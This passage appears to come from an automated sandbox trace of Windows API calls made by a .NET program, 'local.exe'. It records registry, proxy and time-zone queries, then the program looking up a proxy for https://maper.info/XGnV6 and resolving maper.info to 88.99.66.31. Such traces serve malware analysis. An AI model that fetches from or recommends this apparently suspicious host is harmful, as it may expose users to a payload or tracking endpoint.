lpOverlapped=0x0) returned 1 [0042.886] CloseHandle (hObject=0x268) returned 1 [0042.887] GetCurrentProcess () returned 0xffffffff [0042.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae4c8 | out: TokenHandle=0x3ae4c8*=0x268) returned 1 [0042.888] GetCurrentProcess () returned 0xffffffff [0042.888] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae4c8 | out: TokenHandle=0x3ae4c8*=0x274) returned 1 [0042.889] GetCurrentProcess () returned 0xffffffff [0042.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae394 | out: TokenHandle=0x3ae394*=0x278) returned 1 [0042.889] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae394 | out: lpFileInformation=0x3ae394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.889] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ade40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0042.890] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\local.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae394 | out: lpFileInformation=0x3ae394*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.890] GetCurrentProcess () returned 0xffffffff [0042.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae4c8 | out: TokenHandle=0x3ae4c8*=0x27c) returned 1 [0042.890] GetCurrentProcess () returned 0xffffffff [0042.890] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae4c8 | out: TokenHandle=0x3ae4c8*=0x280) returned 1 [0042.907] GetCurrentProcess () returned 0xffffffff [0042.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae290 | out: TokenHandle=0x3ae290*=0x284) returned 1 [0042.937] GetCurrentProcess () returned 0xffffffff [0042.937] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2a0 | out: TokenHandle=0x3ae2a0*=0x288) returned 1 [0042.947] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x28c [0042.947] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x290 [0042.952] GetCurrentProcess () returned 0xffffffff [0042.952] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2b0 | out: TokenHandle=0x3ae2b0*=0x294) returned 1 [0042.954] GetCurrentProcess () returned 0xffffffff [0042.954] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2c0 | out: TokenHandle=0x3ae2c0*=0x298) returned 1 [0042.956] QueryPerformanceFrequency (in: lpFrequency=0x1e5a28 | out: lpFrequency=0x1e5a28*=100000000) returned 1 [0042.956] QueryPerformanceCounter (in: lpPerformanceCount=0x3ae6c4 | out: lpPerformanceCount=0x3ae6c4*=16324468197) returned 1 [0042.960] GetCurrentProcess () returned 0xffffffff [0042.960] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae27c | out: TokenHandle=0x3ae27c*=0x29c) returned 1 [0042.964] GetCurrentProcess () returned 0xffffffff [0042.964] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae28c | out: TokenHandle=0x3ae28c*=0x2a0) returned 1 [0042.975] GetCurrentProcess () returned 0xffffffff [0042.975] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae290 | out: TokenHandle=0x3ae290*=0x2a4) returned 1 [0042.977] GetCurrentProcess () returned 0xffffffff [0042.977] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae2a0 | out: TokenHandle=0x3ae2a0*=0x2a8) returned 1 [0042.982] GetCurrentProcess () returned 0xffffffff [0042.982] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae5ac | out: TokenHandle=0x3ae5ac*=0x2ac) returned 1 [0042.988] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ad6f4 | out: phkResult=0x3ad6f4*=0x2b0) returned 0x0 [0042.988] RegQueryValueExW (in: hKey=0x2b0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x3ad714, lpData=0x0, lpcbData=0x3ad710*=0x0 | out: lpType=0x3ad714*=0x1, lpData=0x0, lpcbData=0x3ad710*=0xe) returned 0x0 [0042.988] RegQueryValueExW (in: hKey=0x2b0, lpValueName="InstallationType", lpReserved=0x0, lpType=0x3ad714, lpData=0x257fcdc, lpcbData=0x3ad710*=0xe | out: lpType=0x3ad714*=0x1, lpData="Client", lpcbData=0x3ad710*=0xe) returned 0x0 [0042.989] RegCloseKey (hKey=0x2b0) returned 0x0 [0043.473] CoTaskMemAlloc (cb=0xcc0) returned 0x472538 [0043.473] RasEnumConnectionsW (in: param_1=0x472538, param_2=0x3ae5bc, param_3=0x3ae5c0 | out: param_1=0x472538, param_2=0x3ae5bc, param_3=0x3ae5c0) returned 0x0 [0043.603] CoTaskMemFree (pv=0x472538) [0043.609] WSAStartup (in: wVersionRequired=0x202, lpWSAData=0x3ae3a4 | out: lpWSAData=0x3ae3a4) returned 0 [0043.617] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2f0 [0043.816] setsockopt (s=0x2f0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0043.816] closesocket (s=0x2f0) returned 0 [0043.816] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x0) returned 0x2f0 [0043.844] setsockopt (s=0x2f0, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0043.844] closesocket (s=0x2f0) returned 0 [0043.844] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2f0 [0043.845] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2f4 [0043.846] ioctlsocket (in: s=0x2f0, cmd=-2147195266, argp=0x3ae5c4 | out: argp=0x3ae5c4) returned 0 [0043.847] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x2f8 [0043.847] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x2fc [0043.847] ioctlsocket (in: s=0x2f8, cmd=-2147195266, argp=0x3ae5c4 | out: argp=0x3ae5c4) returned 0 [0043.848] WSAIoctl (in: s=0x2f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x3ae5ac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x3ae5ac, lpOverlapped=0x0) returned -1 [0043.849] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ae2dc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0043.860] WSAEventSelect (s=0x2f0, hEventObject=0x2f4, lNetworkEvents=512) returned 0 [0043.860] WSAIoctl (in: s=0x2f8, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x3ae5ac, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x3ae5ac, lpOverlapped=0x0) returned -1 [0043.861] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ae2dc, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0043.861] WSAEventSelect (s=0x2f8, hEventObject=0x2fc, lNetworkEvents=512) returned 0 [0043.861] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x304 [0043.862] RasConnectionNotificationW (param_1=0xffffffff, param_2=0x304, param_3=0x3) returned 0x0 [0043.868] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0x3ae5d8 | out: phkResult=0x3ae5d8*=0x31c) returned 0x0 [0043.869] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae588 | out: phkResult=0x3ae588*=0x320) returned 0x0 [0043.870] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x324 [0043.870] RegNotifyChangeKeyValue (hKey=0x320, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x324, fAsynchronous=1) returned 0x0 [0043.875] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae58c | out: phkResult=0x3ae58c*=0x338) returned 0x0 [0043.875] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x33c [0043.875] RegNotifyChangeKeyValue (hKey=0x338, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x33c, fAsynchronous=1) returned 0x0 [0043.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae58c | out: phkResult=0x3ae58c*=0x340) returned 0x0 [0043.876] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x344 [0043.876] RegNotifyChangeKeyValue (hKey=0x340, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x344, fAsynchronous=1) returned 0x0 [0043.876] GetCurrentProcess () returned 0xffffffff [0043.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae580 | out: TokenHandle=0x3ae580*=0x348) returned 1 [0043.881] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ade90 | out: phkResult=0x3ade90*=0x34c) returned 0x0 [0043.881] RegQueryValueExW (in: hKey=0x34c, lpValueName="LegacyWPADSupport", lpReserved=0x0, lpType=0x3adeac, lpData=0x0, lpcbData=0x3adea8*=0x0 | out: lpType=0x3adeac*=0x0, lpData=0x0, lpcbData=0x3adea8*=0x0) returned 0x2 [0043.881] RegCloseKey (hKey=0x34c) returned 0x0 [0044.153] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x432680 [0044.213] WinHttpSetTimeouts (hInternet=0x432680, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1 [0044.213] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x3ae58c | out: pProxyConfig=0x3ae58c) returned 1 [0044.631] CoTaskMemAlloc (cb=0x20e) returned 0x48a818 [0044.631] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_Disabled", lpBuffer=0x48a818, nSize=0x105 | out: lpBuffer="\x92a0\x48\x1960\x48\x5c00\x48") returned 0x0 [0044.631] CoTaskMemFree (pv=0x48a818) [0044.631] CoTaskMemAlloc (cb=0x20e) returned 0x48a818 [0044.631] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.HttpWebRequest_MinCount", lpBuffer=0x48a818, nSize=0x105 | out: lpBuffer="\x92a0\x48\x1960\x48\x5c00\x48") returned 0x0 [0044.631] CoTaskMemFree (pv=0x48a818) [0044.636] EtwEventRegister () returned 0x0 [0044.655] GetCurrentProcess () returned 0xffffffff [0044.655] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae258 | out: TokenHandle=0x3ae258*=0x388) returned 1 [0044.656] GetCurrentProcess () returned 0xffffffff [0044.657] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae268 | out: TokenHandle=0x3ae268*=0x38c) returned 1 [0044.661] SetEvent (hEvent=0x28c) returned 1 [0044.670] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4fc*=0x304, lpdwindex=0x3ae31c | out: lpdwindex=0x3ae31c) returned 0x80010115 [0044.779] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4dc*=0x2f4, lpdwindex=0x3ae2fc | out: lpdwindex=0x3ae2fc) returned 0x80010115 [0044.779] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae4dc*=0x2fc, lpdwindex=0x3ae2fc | out: lpdwindex=0x3ae2fc) returned 0x80010115 [0044.780] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae530*=0x324, lpdwindex=0x3ae34c | out: lpdwindex=0x3ae34c) returned 0x80010115 [0044.780] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae530*=0x33c, lpdwindex=0x3ae34c | out: lpdwindex=0x3ae34c) returned 0x80010115 [0044.780] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x0, cHandles=0x1, pHandles=0x3ae530*=0x344, lpdwindex=0x3ae34c | out: lpdwindex=0x3ae34c) returned 0x80010115 [0044.781] WinHttpGetProxyForUrl (in: hSession=0x432680, lpcwszUrl="https://maper.info/XGnV6", pAutoProxyOptions=0x3ae4c0, pProxyInfo=0x3ae530 | out: pProxyInfo=0x3ae530) returned 0 [0047.415] GetCurrentProcess () returned 0xffffffff [0047.415] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae1d4 | out: TokenHandle=0x3ae1d4*=0x3c8) returned 1 [0047.416] GetCurrentProcess () returned 0xffffffff [0047.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae1e4 | out: TokenHandle=0x3ae1e4*=0x3d0) returned 1 [0047.417] GetTimeZoneInformation (in: lpTimeZoneInformation=0x3ae3e4 | out: lpTimeZoneInformation=0x3ae3e4) returned 0x1 [0047.426] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0x3ae238 | out: pTimeZoneInformation=0x3ae238) returned 0x1 [0047.430] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae31c | out: phkResult=0x3ae31c*=0x3d4) returned 0x0 [0047.430] RegQueryValueExW (in: hKey=0x3d4, lpValueName="TZI", lpReserved=0x0, lpType=0x3ae338, lpData=0x0, lpcbData=0x3ae334*=0x0 | out: lpType=0x3ae338*=0x3, lpData=0x0, lpcbData=0x3ae334*=0x2c) returned 0x0 [0047.430] RegQueryValueExW (in: hKey=0x3d4, lpValueName="TZI", lpReserved=0x0, lpType=0x3ae338, lpData=0x2585d74, lpcbData=0x3ae334*=0x2c | out: lpType=0x3ae338*=0x3, lpData=0x2585d74*, lpcbData=0x3ae334*=0x2c) returned 0x0 [0047.431] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\AUS Eastern Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ae170 | out: phkResult=0x3ae170*=0x3d8) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x3ae18c, lpData=0x0, lpcbData=0x3ae188*=0x0 | out: lpType=0x3ae18c*=0x4, lpData=0x0, lpcbData=0x3ae188*=0x4) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="FirstEntry", lpReserved=0x0, lpType=0x3ae18c, lpData=0x3ae178, lpcbData=0x3ae188*=0x4 | out: lpType=0x3ae18c*=0x4, lpData=0x3ae178*=0x7d7, lpcbData=0x3ae188*=0x4) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="LastEntry", lpReserved=0x0, lpType=0x3ae18c, lpData=0x0, lpcbData=0x3ae188*=0x0 | out: lpType=0x3ae18c*=0x4, lpData=0x0, lpcbData=0x3ae188*=0x4) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="LastEntry", lpReserved=0x0, lpType=0x3ae18c, lpData=0x3ae178, lpcbData=0x3ae188*=0x4 | out: lpType=0x3ae18c*=0x4, lpData=0x3ae178*=0x7d8, lpcbData=0x3ae188*=0x4) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="2007", lpReserved=0x0, lpType=0x3ae18c, lpData=0x0, lpcbData=0x3ae188*=0x0 | out: lpType=0x3ae18c*=0x3, lpData=0x0, lpcbData=0x3ae188*=0x2c) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="2007", lpReserved=0x0, lpType=0x3ae18c, lpData=0x2586208, lpcbData=0x3ae188*=0x2c | out: lpType=0x3ae18c*=0x3, lpData=0x2586208*, lpcbData=0x3ae188*=0x2c) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="2008", lpReserved=0x0, lpType=0x3ae18c, lpData=0x0, lpcbData=0x3ae188*=0x0 | out: lpType=0x3ae18c*=0x3, lpData=0x0, lpcbData=0x3ae188*=0x2c) returned 0x0 [0047.431] RegQueryValueExW (in: hKey=0x3d8, lpValueName="2008", lpReserved=0x0, lpType=0x3ae18c, lpData=0x25862c8, lpcbData=0x3ae188*=0x2c | out: lpType=0x3ae18c*=0x3, lpData=0x25862c8*, lpcbData=0x3ae188*=0x2c) returned 0x0 [0047.432] RegCloseKey (hKey=0x3d8) returned 0x0 [0047.432] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x3ae310, lpData=0x0, lpcbData=0x3ae30c*=0x0 | out: lpType=0x3ae310*=0x1, lpData=0x0, lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.432] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x3ae310, lpData=0x2586410, lpcbData=0x3ae30c*=0x20 | out: lpType=0x3ae310*=0x1, lpData="@tzres.dll,-670", lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.432] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x3ae310, lpData=0x0, lpcbData=0x3ae30c*=0x0 | out: lpType=0x3ae310*=0x1, lpData=0x0, lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.432] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x3ae310, lpData=0x2586468, lpcbData=0x3ae30c*=0x20 | out: lpType=0x3ae310*=0x1, lpData="@tzres.dll,-672", lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.433] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x3ae310, lpData=0x0, lpcbData=0x3ae30c*=0x0 | out: lpType=0x3ae310*=0x1, lpData=0x0, lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.433] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x3ae310, lpData=0x25864c0, lpcbData=0x3ae30c*=0x20 | out: lpType=0x3ae310*=0x1, lpData="@tzres.dll,-671", lpcbData=0x3ae30c*=0x20) returned 0x0 [0047.439] CoTaskMemAlloc (cb=0x20c) returned 0x494958 [0047.439] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x494958 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0047.441] CoTaskMemFree (pv=0x494958) [0047.441] CoTaskMemAlloc (cb=0x20e) returned 0x494958 [0047.441] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath=0x494958, pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324 | out: pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324) returned 1 [0047.445] CoTaskMemFree (pv=0x0) [0047.445] CoTaskMemFree (pv=0x494958) [0047.445] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4e0001 [0047.452] CoTaskMemAlloc (cb=0x3ec) returned 0x495d38 [0047.452] LoadStringW (in: hInstance=0x4e0001, uID=0x29e, lpBuffer=0x495d38, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0047.452] CoTaskMemFree (pv=0x495d38) [0047.452] FreeLibrary (hLibModule=0x4e0001) returned 1 [0047.453] CoTaskMemAlloc (cb=0x20c) returned 0x494958 [0047.453] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x494958 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0047.453] CoTaskMemFree (pv=0x494958) [0047.453] CoTaskMemAlloc (cb=0x20e) returned 0x494958 [0047.453] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath=0x494958, pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324 | out: pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324) returned 1 [0047.454] CoTaskMemFree (pv=0x0) [0047.454] CoTaskMemFree (pv=0x494958) [0047.454] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4e0001 [0047.455] CoTaskMemAlloc (cb=0x3ec) returned 0x495d38 [0047.455] LoadStringW (in: hInstance=0x4e0001, uID=0x2a0, lpBuffer=0x495d38, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0047.455] CoTaskMemFree (pv=0x495d38) [0047.455] FreeLibrary (hLibModule=0x4e0001) returned 1 [0047.455] CoTaskMemAlloc (cb=0x20c) returned 0x494958 [0047.455] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x494958 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0047.455] CoTaskMemFree (pv=0x494958) [0047.456] CoTaskMemAlloc (cb=0x20e) returned 0x494958 [0047.456] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath=0x494958, pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324 | out: pwszLanguage=0x0, pcchLanguage=0x3ae32c, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x3ae330, pululEnumerator=0x3ae324) returned 1 [0047.456] CoTaskMemFree (pv=0x0) [0047.456] CoTaskMemFree (pv=0x494958) [0047.457] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x4e0001 [0047.457] CoTaskMemAlloc (cb=0x3ec) returned 0x495d38 [0047.457] LoadStringW (in: hInstance=0x4e0001, uID=0x29f, lpBuffer=0x495d38, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0047.457] CoTaskMemFree (pv=0x495d38) [0047.458] FreeLibrary (hLibModule=0x4e0001) returned 1 [0047.458] RegCloseKey (hKey=0x3d4) returned 0x0 [0047.458] SetEvent (hEvent=0x28c) returned 1 [0047.468] GetNetworkParams (in: pFixedInfo=0x0, pOutBufLen=0x3ae540 | out: pFixedInfo=0x0, pOutBufLen=0x3ae540) returned 0x6f [0047.623] LocalAlloc (uFlags=0x0, uBytes=0x248) returned 0x495d38 [0047.623] GetNetworkParams (in: pFixedInfo=0x495d38, pOutBufLen=0x3ae540 | out: pFixedInfo=0x495d38, pOutBufLen=0x3ae540) returned 0x0 [0047.634] LocalFree (hMem=0x495d38) returned 0x0 [0047.635] CoTaskMemAlloc (cb=0x20e) returned 0x494958 [0047.635] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_Disabled", lpBuffer=0x494958, nSize=0x105 | out: lpBuffer="崸I㺀Iက") returned 0x0 [0047.635] CoTaskMemFree (pv=0x494958) [0047.635] CoTaskMemAlloc (cb=0x20e) returned 0x494958 [0047.635] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.Connection_MinCount", lpBuffer=0x494958, nSize=0x105 | out: lpBuffer="崸I㺀Iက") returned 0x0 [0047.635] CoTaskMemFree (pv=0x494958) [0047.638] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e8 [0047.639] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3e4 [0047.640] GetAddrInfoW (in: pNodeName="maper.info", pServiceName=0x0, pHints=0x3ae430*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x3ae3d8 | out: ppResult=0x3ae3d8*=0x64f4958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="maper.info", ai_addr=0x64f4980*(sa_family=2, sin_port=0x0, sin_addr="88.99.66.31"), ai_next=0x0)) returned 0 [0048.937] FreeAddrInfoW (pAddrInfo=0x64f4958*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="maper.info", ai_addr=0x64f4980*(sa_family=2, sin_port=0x0, sin_addr="88.99.66.31"), ai_next=0x0)) [0048.939] WSASocketW (af=2, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3f0 [0048.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f8 [0048.940] ioctlsocket (in: s=0x3f0, cmd=-2147195266, argp=0x3ae408 | out: argp=0x3ae408) returned 0 [0048.940] WSASocketW (af=23, type=2, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x3fc [0048.940] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x404 [0048.940] ioctlsocket (in: s=0x3fc, cmd=-2147195266, argp=0x3ae408 | out: argp=0x3ae408) returned 0 [0048.940] WSAIoctl (in: s=0x3f0, dwIoControlCode=0x28000017, lpvInBuffer=0x0, cbInBuffer=0x0, lpvOutBuffer=0x0, cbOutBuffer=0x0, lpcbBytesReturned=0x3ae3f0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpvOutBuffer=0x0, lpcbBytesReturned=0x3ae3f0, lpOverlapped=0x0) returned -1 [0048.940] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x2733, dwLanguageId=0x0, lpBuffer=0x3ae120, nSize=0x101, Arguments=0x0 | out: lpBuffer="A non-blocking socket operation could not be completed immediately.\r\n") returned 0x45 [0048.941] 